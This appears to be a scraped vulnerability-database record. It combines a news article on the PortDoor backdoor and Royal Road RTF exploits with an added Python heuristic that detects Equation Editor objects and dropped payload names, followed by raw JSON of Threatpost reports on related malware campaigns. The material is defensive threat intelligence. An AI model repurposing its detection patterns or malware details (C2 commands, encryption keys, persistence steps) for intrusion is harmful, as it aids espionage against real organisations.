A threat actor believed to be working on behalf of Chinese state-sponsored interests was recently observed targeting a Russia-based defense contractor involved in designing nuclear submarines for the naval arm of the Russian Armed Forces.
The phishing attack, which singled out a general director working at the Rubin Design Bureau, leveraged the infamous "Royal Road" Rich Text Format (RTF) weaponizer to deliver a previously undocumented Windows backdoor dubbed "**PortDoor**," according to Cybereason's Nocturnus threat intelligence team.
"PortDoor has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more," the researchers [said](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>) in a write-up on Friday.
Rubin Design Bureau is a submarine design center located in Saint Petersburg, accounting for the design of over [85% of submarines](<https://ckb-rubin.ru/en/company_profile/>) in the Soviet and Russian Navy since its origins in 1901, including several generations of strategic missile cruiser submarines.
Figure: Content of the weaponized RTF document
Over the years, Royal Road has earned its place as a [tool of choice](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>) among an array of Chinese threat actors such as Goblin Panda, Rancor Group, TA428, Tick, and Tonto Team. The attacks, which have exploited multiple flaws in Microsoft's [Equation Editor](<https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018>) (CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802) as far back as late 2018, take the form of targeted spear-phishing campaigns that use malicious RTF documents to deliver custom malware to unsuspecting high-value targets.
This newly discovered attack is no different, with the adversary using a spear-phishing email addressed to the submarine design firm as an initial infection vector. While previous versions of Royal Road were found to drop encoded payloads by the name of "8.t," the email comes embedded with a malware-laced document, which, when opened, delivers an encoded file called "e.o" to fetch the PortDoor implant, implying a new variant of the weaponizer in use.
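As an added example (not code from the article or from Cybereason), the following Python triage heuristic flags RTF files that embed Equation Editor objects, the delivery path Royal Road relies on, and looks for the dropped-payload names the article mentions inside embedded object data. The sample RTF documents are constructed inline; the Equation.3 CLSID is a public value not taken from the page, and the file-name check assumes the dropped name appears as a NUL-terminated string in the embedded object, which is a heuristic rather than a rule.

```python
import re

# Equation.3 class identifier: public value from CVE-2017-11882 analyses, not from the article.
EQUATION_CLSID = "0002CE02-0000-0000-C000-000000000046"
# Dropped payload names the article attributes to Royal Road variants (old and new).
KNOWN_DROP_NAMES = (b"8.t", b"e.o")

OBJCLASS_RE = re.compile(r"\\objclass\s+([A-Za-z0-9.]+)")
OBJDATA_RE = re.compile(r"\\objdata\s*([0-9A-Fa-f\s]+)")


def clsid_bytes(clsid: str) -> bytes:
    """Serialize a GUID string the way it is stored on disk (first three fields little-endian)."""
    d1, d2, d3, d4, d5 = clsid.split("-")
    return (bytes.fromhex(d1)[::-1] + bytes.fromhex(d2)[::-1]
            + bytes.fromhex(d3)[::-1] + bytes.fromhex(d4 + d5))


def decode_objdata(rtf: str) -> list[bytes]:
    """Return each \\objdata hex run as raw bytes; malformed runs are skipped."""
    blobs = []
    for m in OBJDATA_RE.finditer(rtf):
        hexrun = re.sub(r"\s+", "", m.group(1))
        try:
            blobs.append(bytes.fromhex(hexrun[: len(hexrun) & ~1]))
        except ValueError:
            continue
    return blobs


def triage_rtf(rtf: str) -> list[str]:
    """Heuristic findings for an RTF document; an empty list means nothing suspicious was seen."""
    findings = []
    for cls in OBJCLASS_RE.findall(rtf):
        if cls.lower().startswith("equation"):
            findings.append(f"objclass declares {cls}")
    guid = clsid_bytes(EQUATION_CLSID)
    eq_native = "Equation Native".encode("utf-16-le")  # stream name inside the OLE container
    for i, blob in enumerate(decode_objdata(rtf)):
        if guid in blob:
            findings.append(f"objdata[{i}]: Equation.3 CLSID")
        if b"Equation.3" in blob or eq_native in blob:
            findings.append(f"objdata[{i}]: Equation Editor class/stream name")
        for name in KNOWN_DROP_NAMES:
            # Assumption: an embedded (Packager-style) file name is stored NUL-terminated.
            if name + b"\x00" in blob:
                findings.append(f"objdata[{i}]: embedded file name {name.decode()}")
    return findings


def build_sample_rtf(class_name: str, payload: bytes) -> str:
    """Constructed sample: an OLE1-style embedded object header wrapped in minimal RTF."""
    cls = class_name.encode() + b"\x00"
    header = (b"\x01\x05\x00\x00"                      # OLEVersion
              + b"\x02\x00\x00\x00"                    # FormatID: embedded object
              + len(cls).to_bytes(4, "little") + cls   # ClassName
              + b"\x00\x00\x00\x00" * 2                # empty TopicName / ItemName
              + len(payload).to_bytes(4, "little") + payload)
    return ("{\\rtf1{\\object\\objemb{\\*\\objclass " + class_name + "}"
            "{\\*\\objdata " + header.hex() + "}}}")


# Constructed inputs: an Equation Editor object, a Packager-style object carrying "8.t", and a benign one.
MALICIOUS_SAMPLE = build_sample_rtf(
    "Equation.3",
    clsid_bytes(EQUATION_CLSID) + "Equation Native".encode("utf-16-le") + b"\x00" * 16)
PACKAGER_SAMPLE = build_sample_rtf("Package", b"\x02\x00" + b"8.t\x00" + b"C:\\Temp\\8.t\x00")
BENIGN_SAMPLE = build_sample_rtf("Word.Document.8", b"hello world")

if __name__ == "__main__":
    for label, sample in (("equation", MALICIOUS_SAMPLE), ("packager", PACKAGER_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, triage_rtf(sample))
```

Run it against real documents by reading the file as text and passing it to triage_rtf; a non-empty result is a reason to quarantine and analyze, not proof of compromise.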
Said to be engineered with obfuscation and persistence in mind, PortDoor runs the backdoor gamut with a wide range of features that allow it to profile the victim machine, escalate privileges, download and execute arbitrary payloads received from an attacker-controlled server, and export the results back to the server.
"The infection vector, social engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests," the researchers said.
"THREATPOST:6456A6FCBD57F31DF6ECF8310230973D", "THREATPOST:742E793D712CB6B2F049DBEA5373016E", "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "THREATPOST:AB80E18E0D0B4D9D91D9BF01EFBE3AC6", "THREATPOST:B2352D090C3E08DD00F192FB220C5B99", "THREATPOST:B4579714760429B9531FF0E79E44C578", "THREATPOST:B64BFE4F560527B57D4157D27CF3E553", "THREATPOST:BA70A6314CF0FB9F4A69C5BB4F1D6BC0", "THREATPOST:BF3CD27D3018BF7BD8E93D42325DAA73", "THREATPOST:F2BB55148C9EC48C94C05B4B2CBBBC1A", "THREATPOST:F8AE6E328FD84A15442D0329003F9E9B"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:3D0DF0AC0B5B6A3B4D80A495AF488F03", "TRENDMICROBLOG:6A0454A8A4891A1004496709868EC034"]}, {"type": "zdt", "idList": ["1337DAY-ID-29022", "1337DAY-ID-29119"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-11882", "epss": "0.974500000", "percentile": "0.998980000", "modified": "2023-03-16"}, {"cve": "CVE-2018-0798", "epss": "0.970080000", "percentile": "0.995390000", "modified": "2023-03-17"}, {"cve": "CVE-2018-0802", "epss": "0.974870000", "percentile": "0.999420000", "modified": "2023-03-16"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1660032824, "score": 1684007085, "epss": 1679070268}, "_internal": {"score_hash": "a24f44ce104fed0cdbab01397cdba896"}}
{"threatpost": [{"lastseen": "2021-06-07T19:08:25", "description": "An ongoing surveillance operation has been uncovered that targets a Southeast Asian government, researchers said \u2013 using a previously unknown espionage malware.\n\nAccording to Check Point Research, the attack involves spear-phishing emails with malicious Word documents to gain initial access, along with the exploitation of older, known Microsoft Office security vulnerabilities. But most notable, researchers said, is the novel backdoor, which they said has been in development by a Chinese APT for at least three years.\n\nThe documents were \u201csent to different employees of a government entity in Southeast Asia,\u201d according to [the Check Point analysis](<https://research.checkpoint.com/2021/chinese-apt-group-targets-southeast-asian-government-with-previously-unknown-backdoor/>). \u201cIn some cases, the emails are spoofed to look like they were from other government-related entities. The attachments to these emails are weaponized copies of legitimate looking official documents and use the remote template technique to pull the next stage from the attacker\u2019s server.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe malicious documents download a template from various URLs, according to the analysis, which are .RTF files embedded with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder. 
RoyalRoad is a tool that researchers have said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428; it generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe RoyalRoad-generated RTF document contains an encrypted payload and shellcode, according to the analysis.\n\n\u201cTo decrypt the payload from the package, the attacker uses the RC4 algorithm with the key 123456, and the resulted DLL file is saved as 5.t in the %Temp% folder,\u201d researchers said. \u201cThe shellcode is also responsible for the persistence mechanism \u2013 it creates the scheduled task named Windows Update that should run the exported function StartW from 5.t with rundll32.exe, once a day.\u201d\n\nThe .DLL gathers data on the victim\u2019s computer including the OS name and version, user name, MAC addresses of networking adapters and antivirus information. All of the data is encrypted and then sent to the attackers\u2019 command-and-control server (C2) via [GET HTTP request method](<https://developer.mozilla.org/en-US/docs/Web/HTTP/Methods/GET>). After that, a multi-stage chain eventually results in the installation of the backdoor module, which is called \u201cVictory.\u201d It \u201cappears to be a custom and unique malware,\u201d according to Check Point.\n\n## **Victory Backdoor**\n\nThe malware is built to steal information and provide consistent access to the victim. 
Check Point researchers said it can take screenshots, manipulate files (including creating, deleting, renaming and reading them), gather information on the top-level windows that are open, and shut down the computer.\n\nInterestingly, the malware appears to be related to previously developed tools.\n\n\u201cSearching for files similar to the final backdoor in the wild, we encountered a set of files that were submitted to VirusTotal in 2018,\u201d according to the analysis. \u201cThe files were named by the author as MClient and appear to be part of a project internally called SharpM, according to their PDB paths. Compilation timestamps also show a similar timeframe between July 2017 and June 2018, and upon examination of the files, they were found to be older test versions of our VictoryDll backdoor and its loaders chain.\u201d\n\nThe specific implementation of the main backdoor functionality is identical; and, the connection method has the same format, according to the firm. Also, MClient\u2019s connection XOR key and VictoryDll\u2019s initial XOR key are the same.\n\nHowever, there are differences between the two in terms of architecture, functionality and naming conventions. For instance, MClient features a keylogger, which is absent for Victory. And, Victory\u2019s exported function is named MainThread, while in all versions of the MClient variant the export function was named GetCPUID, according to Check Point.\n\n\u201cOverall, we can see that in these three years, most of the functionality of MClient and AutoStartup_DLL was preserved and split between multiple components \u2013 probably to complicate the analysis and decrease the detection rates at each stage,\u201d the form said. \u201cWe may also assume that there exist other modules based on the code from 2018 that might be installed by the attacker in the later stages of the attack.\u201d\n\n## **Attribution**\n\nCheck Point has attributed the campaign to a Chinese APT. 
One of the clues is that the first-stage C2 servers are hosted by two different cloud services, located in Hong Kong and Malaysia. These are active in only a limited daily window, returning payloads only from 01:00 \u2013 08:00 UTC Monday through Friday, which corresponds with the Chinese workday. Also, Check Point said that the servers went dormant in the period between May 1 and 5 \u2013 which China\u2019s Labor Day holidays.\n\nOn top of that, the RoyalRoad RTF exploit building kit is a tool of choice among Chinese APT groups; and some test versions of the backdoor contained internet connectivity check with www.baidu.com \u2013 a popular Chinese website.\n\n\u201cWe unveiled the latest activity of what seems to be a long-running Chinese operation that managed to stay under the radar for more than three years,\u201d Check Point concluded. \u201cIn this campaign, the attackers utilized the set of Microsoft Office exploits and loaders with anti-analysis and anti-debugging techniques to install a previously unknown backdoor.\u201d\n\n**Join Threatpost for \u201cA Walk On The Dark Side: A Pipeline Cyber Crisis Simulation\u201d\u2013 a LIVE interactive demo on **[**Wed, June 9 at 2:00 PM EDT**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)**. Sponsored by Immersive Labs, find out whether you have the tools and skills to prevent a Colonial Pipeline-style attack on your organization. Questions and LIVE audience participation encouraged. 
Join the discussion and **[**Register HERE**](<https://threatpost.com/webinars/take-a-walk-on-the-darkside/?utm_source=ART&utm_medium=ART&utm_campaign=June_ImmersiveLabs_Webinar>)** for free.**\n", "cvss3": {}, "published": "2021-06-07T18:49:44", "type": "threatpost", "title": "Novel 'Victory' Backdoor Spotted in Chinese APT Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-06-07T18:49:44", "id": "THREATPOST:616358A88F9C1E69920585FDC717CF1F", "href": "https://threatpost.com/victory-backdoor-apt-campaign/166700/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-30T19:38:25", "description": "A previously undocumented backdoor malware, dubbed PortDoor, is being used by a probable Chinese advanced persistent threat actor (APT) to target the Russian defense sector, according to researchers.\n\nThe Cybereason Nocturnus Team observed the cybercriminals specifically going after the Rubin Design Bureau, which designs submarines for the Russian Federation\u2019s Navy. 
The initial target of the attack was a general director there named Igor Vladimirovich, researchers said, who received a phishing email.\n\n[](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\n\nJoin Threatpost for \u201c[Fortifying Your Business Against Ransomware, DDoS & Cryptojacking Attacks](<https://threatpost.com/webinars/fortifying-your-business-against-attacks/?utm_source=ART&utm_medium=ART&utm_campaign=May_Zoho_Webinar>)\u201d a LIVE roundtable event on Wednesday, May 12 at 2:00 PM EDT for this FREE webinar sponsored by Zoho ManageEngine.\n\nThe attack began with the [RoyalRoad weaponizer](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), also known as the 8.t Dropper/RTF exploit builder \u2013 a tool that Cybereason said is [part of the arsenal of several Chinese APTs](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>), such as Tick, Tonto Team and TA428. 
RoyalRoad generates weaponized RTF documents that exploit vulnerabilities in Microsoft\u2019s [Equation Editor](<https://threatpost.com/threatlist-microsoft-macros-remain-top-vector-for-malware-delivery/137428/>) (CVE-2017-11882, CVE-2018-0798 and CVE-2018-0802).\n\nThe use of RoyalRoad is one of the reasons the company believes Chinese cybercriminals to be behind the attack.\n\n\u201cThe accumulated evidence, such as the infection vector, social-engineering style, use of RoyalRoad against similar targets, and other similarities between the newly discovered backdoor sample and other known Chinese APT malware, all bear the hallmarks of a threat actor operating on behalf of Chinese state-sponsored interests,\u201d according to a [Cybereason analysis](<https://www.cybereason.com/blog/portdoor-new-chinese-apt-backdoor-attack-targets-russian-defense-sector>), published Friday.\n\n## **A Quiet Espionage Malware**\n\nThe RoyalRoad tool was seen fetching the unique PortDoor sample once the malicious RTF document is opened, which researchers said was designed with stealth in mind. It has multiple functionalities, including the ability to do reconnaissance, target profiling, delivery of additional payloads, privilege escalation, process manipulation, static detection antivirus evasion, one-byte XOR encryption, AES-encrypted data exfiltration and more.\n\nOnce executed, the backdoor decrypts the strings using a hardcoded 0xfe XOR key in order to retrieve its configuration information. 
This includes the command-and-control (C2) server address, a victim identifier and some other minor information.\n\nThe malware then creates an additional file in %temp% with the hardcoded name \u201c58097616.tmp\u201d and writes the GetTickCount value multiplied by a random number to it: \u201cThis can be used as an additional identifier for the target, and also as a placeholder for the previous presence of this malware,\u201d researchers explained.\n\nAfter that, it establishes its C2 connection, which facilitates the transfer of data using TCP over raw sockets, or via HTTPS \u2013 with proxy support. At this point, Cybereason said that PortDoor also has the ability to achieve privilege escalation by stealing explorer.exe tokens.\n\nThen, the malware gathers basic PC info to be sent to the C2, which it bundles with a unique identifier, after which is awaits further instructions.\n\nThe C2 commands are myriad:\n\n * List running processes\n * Open process\n * Get free space in logical drives\n * Files enumeration\n * Delete file\n * Move file\n * Create process with a hidden window\n * Open file for simultaneous operations\n * Write to file\n * Close handle\n * Open file and write directly to disk\n * Look for the \u201cKr*^j4\u201d string\n * Create pipe, copy data from it and AES encrypt\n * Write data to file, append with \u201c\\n\u201d\n * Write data to file, append with \u201cexit\\n\u201d\n\nPortDoor also employs an anti-analysis technique known as dynamic API resolving, according to the analysis.\n\n\u201cThe backdoor is able to hide most of its main functionality and avoid static detection of suspicious API calls by dynamically resolving its API calls instead of using static imports,\u201d researchers explained.\n\n## **Chinese APTs in the Cyberattack Mix \u2013 Probably**\n\nCybereason\u2019s analysis did not yield up a specific Chinese APT actor who would likely be responsible for the attack. 
However, the researchers said they could make some educated guesses.\n\n\u201cThere are a couple of known Chinese APT groups that share quite a few similarities with the threat actor behind the new malware samples analyzed,\u201d according to the report.\n\nFor instance, the RTF file used in the attack was weaponized with RoyalRoad v7, which was previously observed being used by the Tonto Team, TA428 and Rancor APTs.\n\n\u201cBoth the Tonto Team and TA428 threat actors have been observed attacking Russian organizations in the past, and more specifically attacking research and defense-related targets,\u201d according to the analysis. \u201cWhen comparing the spear-phishing email and malicious documents in these attacks with previously examined phishing emails and lure documents used by the Tonto Team to attack Russian organizations, there are certain similarities in the linguistic and visual style used by the attackers in the phishing emails and documents.\u201d\n\nThat said, the PortDoor malware doesn\u2019t share significant code similarities with previously known malware used by those groups \u2013 leading Cybereason to conclude that it is not a variant of a known malware, which makes it useless in attribution efforts.\n\n\u201cLastly, we are also aware that there could be other groups, known or yet unknown, that could be behind the attack and the development of the PortDoor backdoor,\u201d researchers concluded. \u201cWe hope that as time goes by, and with more evidence gathered, the attribution could be more concrete.\u201d\n\n**Download our exclusive FREE Threatpost Insider eBook,** **_\u201c[2021: The Evolution of Ransomware](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>),\u201d_**** to help hone your cyber-defense strategies against this growing scourge. We go beyond the status quo to uncover what\u2019s next for ransomware and the related emerging risks. 
Get the whole story and [DOWNLOAD](<https://threatpost.com/ebooks/2021-the-evolution-of-ransomware/?utm_source=April_eBook&utm_medium=ART&utm_campaign=ART>) the eBook now \u2013 on us!**\n\n_ _\n", "cvss3": {}, "published": "2021-04-30T19:32:34", "type": "threatpost", "title": "PortDoor Espionage Malware Takes Aim at Russian Defense Sector", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0798", "CVE-2018-0802"], "modified": "2021-04-30T19:32:34", "id": "THREATPOST:9AE8698D8AABA0F11676A29CECC6D7BA", "href": "https://threatpost.com/portdoor-espionage-malware-takes-aim-at-russian-defense-sector/165770/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:52:39", "description": "Evidence has surfaced that the Cobalt Group \u2013 the threat actors behind widespread attacks on banks and ATM jackpotting campaigns across Europe \u2013 is continuing to operate, despite the arrest of its accused ringleader in March.\n\nThe Cobalt Group, first burst on the scene in 2016: in a single night, the group stole the equivalent of over $32,000 (in local currency) from six ATMs in Eastern Europe. Throughout 2017 the group expanded its focus to financial-sector phishing schemes and new regions, including North and South America, as well as Western Europe. researchers estimated that in the first six months of 2017 Cobalt sent phishing messages with malicious attachments to over 3,000 users at 250 companies in 13 countries.\n\nIn a report [released last week](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) (PDF) by Positive Technologies, researchers there said in mid-May 2018 they detected a phishing campaign directed at the financial sector that has an ultimate goal of downloading a JavaScript backdoor on target\u2019s computers. 
Researchers discovered the backdoor to be loaded up with malevolent functions, including cyberespionage and the ability to launch programs, along with the ability to update itself, remove itself and detect antivirus software. It also encrypts its communications with the C2 server with RC4. In all, it\u2019s capabilities mirror the backdoor that Cobalt Group has been known to employ in the past, researchers said.\n\n\u201cAlthough [Positive Technologies] specialists did not detect use of the Cobalt Strike tool which gave the group its name, the techniques and tactics are strongly suggestive of the group\u2019s previous attacks,\u201d they noted.\n\nCobalt typically employs a number of techniques to evade user scrutiny and spam filters. The group hacks weakly protected public sites, which it uses to host malware. It sends fake messages that appear to come from financial regulators and company partners, and targets both work and personal addresses of employees. In most cases, the goal of phishing messages is to compromise bank systems used for ATM management. This enables infecting ATMs with malware that takes control of the cash dispenser. During the final stage of the attack, money mules collect cash from the hacked ATMs.\n\nThe new May campaign bore all of the hallmarks of the group beyond just the payload. For one, the phony messages were sent from a domain whose structure is identical to those previously used by the bad actors. These messages also have a link that points to a malicious document weaponized with three exploits for remote code execution in Microsoft Word (CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802), generated by the Threadkit exploit kit. 
This kill chain is the same as that of a Cobalt Group campaign detected in February.\n\n\u201cCobalt relies on social engineering for the first stage of attacks, and for good reason: almost 30 percent of recipients click links in phishing messages, as our statistics show,\u201d explained Andrew Bershadsky, PT CTO, adding that in 27 percent of cases, recipients click links in phishing messages. Attackers are often able to draw employees into correspondence (and even security staff, in 3 percent of cases). And if a message is sent from the address of a real company (a technique used by Cobalt), attackers\u2019 success rate jumps to 33 percent.\n\nAs for how the rest of the May attack unfolded, PT security researchers [said](<https://www.ptsecurity.com/upload/corporate/ww-en/analytics/New-Bank-Attacks-eng.pdf>) that once one of the exploits is triggered, a BAT script runs that launches a [standard Windows utility](<https://bohops.com/2018/02/26/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence/>) that allows bypassing AppLocker, as well as downloading and running SCT or COM objects using the standard Windows utility regsvr32.exe. The utility in turn downloads the COM-DLL-Dropper, which then fetches the backdoor.\n\nThe resurgence is notable given that the Spanish National Police [arrested](<https://www.tripwire.com/state-of-security/latest-security-news/cobalt-carbanak-malware-group-leader-arrested-spain/>) the Cobalt Group\u2019s leader (also behind the Carbanak gang) on March 26. 
EUROPOL said that the individual was responsible for helping to attack 100 financial institutions worldwide and cause more than 1 billion EUR in damages.\n", "cvss3": {}, "published": "2018-05-28T12:21:42", "type": "threatpost", "title": "Despite Ringleader\u2019s Arrest, Cobalt Group Still Active", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-05-28T12:21:42", "id": "THREATPOST:A79D567955CD3BD88909060ECB743C9F", "href": "https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-04T07:15:20", "description": "Despite the high profile arrest earlier this year of the Cobalt Group ringleader, the threat actors behind the hacking collective are slowly ramping up their malicious behavior. In a new analysis of the threat group, known for its widespread attacks against banks in Eastern Europe over the past several years, the Cobalt Group has recently been observed updating its arsenal with a new version of the ThreadKit malware.\n\nIn a report [issued by security firm Fidelis on Tuesday](<https://www.fidelissecurity.com/sites/default/files/CobaltGroup_nov2018.pdf>) (PDF), researchers outline a number of new developments including:\n\n * Despite an arrest earlier this year of a key member, of the Cobalt Group remains active.\n * A new version on the malware ThreadKit is being actively distributed in October 2018.\n * The CobInt trojan uses a XOR-based obfuscation technique.\n\n## Reemergence of Cobalt Group\n\nThe Cobalt Group first appeared in 2013 and in 2016 made a name for itself with widespread attacks on banks and ATM jackpotting campaigns across Europe. In one single campaign, it was credited for stealing over $32,000 from six Eastern Europe ATMs. 
In the following years the Cobalt Group expanded its focus to include financial-sector phishing schemes and new regions, including North and South America.\n\nIn March, the Cobalt Group was dealt a severe blow when the EUROPOL [announced](<https://www.europol.europa.eu/newsroom/news/mastermind-behind-eur-1-billion-cyber-bank-robbery-arrested-in-spain>) the arrest of the \u201ccriminal mastermind\u201d behind the group in Alicante, Spain. Since then, the group [was observed by Positive Technology](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>) in May as the criminals behind a spear phishing campaign directed at the financial sector that had the goal of enticing victims to download a JavaScript backdoor.\n\n\u201cIn 2017 they expanded their targets from banks to include supply chain companies, financial exchanges, investment funds, and lenders in North America, Western Europe, and South America. Tools used in 2017 included [PetrWrap](<https://threatpost.com/new-petya-distribution-vectors-bubbling-to-surface/126577/>), more_eggs, CobInt and ThreadKit,\u201d wrote Jason Reaves, principal, threat research with the Fidelis Threat Research Team in the report.\n\n**ThreadKit 2.0 **\n\nAfter the arrest of Cobalt Group\u2019s leader, in May the group was spotted changing up its tactics. To that end, the Cobalt Group began focusing on exploits used for remote code execution found in Microsoft Word ([CVE-2017-8570, CVE-2017-11882 and CVE-2018-0802](<https://threatpost.com/despite-ringeaders-arrest-cobalt-group-still-active/132306/>)) and one notably being [the now patched April 2017 zero-day bug](<https://threatpost.com/microsoft-patches-word-zero-day-spreading-dridex-malware/124906/>) ([CVE-2017-0199](<https://threatpost.com/microsoft-patches-three-vulnerabilities-under-attack/124927/>)).\n\n\u201cIn October 2018, [we] identified a new version of ThreadKit. 
As per Cobalt Group\u2019s typical methods, the malware was delivered via phishing email, containing a RFT Microsoft Office attachment which contained an evolved version of the exploit builder kit first uncovered in October 2017,\u201d according to Fidelis. \u201c[This] new version of ThreadKit [utilizes] a macro delivery framework sold and used by numerous actors and groups.\u201d\n\nFidelis\u2019 latest analysis of the ThreadKit also notes \u201ca slight evolution\u201d in the exploit kit designed to better hide from detection. Obfuscation techniques include \u201cplacing the \u2018M\u2019 from the \u2018MZ\u2019 of an executable file into it\u2019s own object and now renaming a number of the objects inside.\u201d\n\nFidelis also pointed out the update including a new download URL where the malware code \u201cobjects\u201d are downloaded from and later combined to create the executable. \u201cA few highlights from the embedded files shows a check for block.txt, which is similar to the previous version\u2019s kill-switch implementation,\u201d Reaves wrote.\n\n**CobInt Adopts New Obfuscation Skills **\n\nThe ThreadKit payload is the trojan Coblnt, a longtime favorite of the Cobalt Group. To further frustrate analysis and detection, the attackers added another layer of obfuscation, a XOR routine used to decode the initial Coblnt payload. A XOR, or XOR cipher, is an encryption algorithm that operates on a set of known principles. Encryption and decryption can be performed by applying and reapplying the XOR function.\n\n\u201cWhat\u2019s interesting here is that the XOR key is replaced by the subtraction value and the subtraction value is replaced by the previously read DWORD value. 
So the only value that\u2019s needed is the hardcoded XOR key, meaning mathematically this entire thing can be solved using a theorem prover such as Z3,\u201d researchers pointed out.\n\nThe decoded payload is the CobInt DLL, which when loaded will \u201csit in a loop beaconing to its C2 and waiting for commands and modules to be executed,\u201d according to Fidelis.\n\nFidelis and other researchers say the arrest of Cobalt group members have only temporarily slowed Carbanak/Cobalt threat actors. In a recent analysis by Kaspersky Lab, researchers said Cobalt arrests have only emboldened members and hastened the process of [splitting the groups into smaller cells](<https://securelist.com/ksb-cyberthreats-to-financial-institutions-2019-overview-and-predictions/88944/>).\n", "cvss3": {}, "published": "2018-12-11T18:40:00", "type": "threatpost", "title": "Cobalt Group Pushes Revamped ThreadKit Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802"], "modified": "2018-12-11T18:40:00", "id": "THREATPOST:55583CEEB1DA64162FA6CCA7B37CB1BB", "href": "https://threatpost.com/cobalt-threadkit-malware/139800/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T23:09:40", "description": "[](<https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/>)There is an unpatched flaw in Microsoft SQL Server that could enable an attacker to access users\u2019 passwords on the database server. The vulnerability is in SQL Server 2000, 2005 and 2008.\n\nThe SQL Server vulnerability was discovered last fall by database-security vendor Sentrigo, which then reported the problem to Microsoft. But the software giant did not consider the problem serious enough to warrant a patch, Sentrigo officials said, so the weakness has remained unpatched for nearly a year. 
Sentrigo has released a [free software tool](<http://www.sentrigo.com/passwords>) that will address the problem, though it does not patch the vulnerability.\n\nThe tool, called Passwordizer, erases the cleartext passwords from the database server.\n\nIn a statement, Microsoft officials said the company is not planning to patch the flaw and does not see it as a problem that requires a security update.\n\nThe flaw lies in the way that SQL Server handles user passwords. By looking at the process memory, an administrator can see other users\u2019 passwords in cleartext. However, in order to see the process memory dump, a user would have to have administrator rights already, a condition that limits the severity of the bug.\n\n\u201cDevelopers go to great lengths to ensure passwords are not even transmitted in clear text (for example at the time of login), let alone stored in a readable form. Users have come to expect that their personal passwords, are exactly that \u2013personal \u2013 and that not even administrators can see them. Exploiting this vulnerability, an administrator will be able to see the passwords of users and applications that have connected to SQL Server, all the way back to the last restart,\u201d said Slavik Markovich, CTO of Sentrigo. \u201cWe respectfully disagree with Microsoft\u2019s view that since it requires administrative privileges, the risk is mitigated. 
Even if you trust your admins, there are plenty of hackers capable of gaining escalated privileges, who could now easily access other systems across the network using these passwords.\u201d\n\nThe flaw can be exploited remotely in SQL Server 2000 and 2005, but in SQL Server 2008 Microsoft made a change to make it more difficult for administrators to access the memory, so an attacker would need local access to the machine in that case.\n", "cvss3": {}, "published": "2009-09-02T12:30:49", "type": "threatpost", "title": "New Unpatched Flaw Surfaces in SQL Server", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:38:44", "id": "THREATPOST:1FB92D9630590CC17FF00234FF9991FF", "href": "https://threatpost.com/new-unpatched-flaw-surfaces-sql-server-090209/73026/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:06:50", "description": "[](<https://threatpost.com/microsoft-plans-record-breaking-patch-tuesday-100710/>)This month\u2019s batch of security patches from Microsoft will be a record-breaking one: 16 bulletins addressing a whopping 49 security vulnerabilities. \n\nAccording to the company\u2019s advance notice, four of the 16 bulletins will be rated \u201ccritical,\u201d Microsoft\u2019s highest severity rating. Microsoft rates a critical vulnerability as one that could be exploited to propagate an Internet worm without user action. \n\nThe 49 vulnerabilities will mark the largest ever batch of patches issued by Microsoft. 
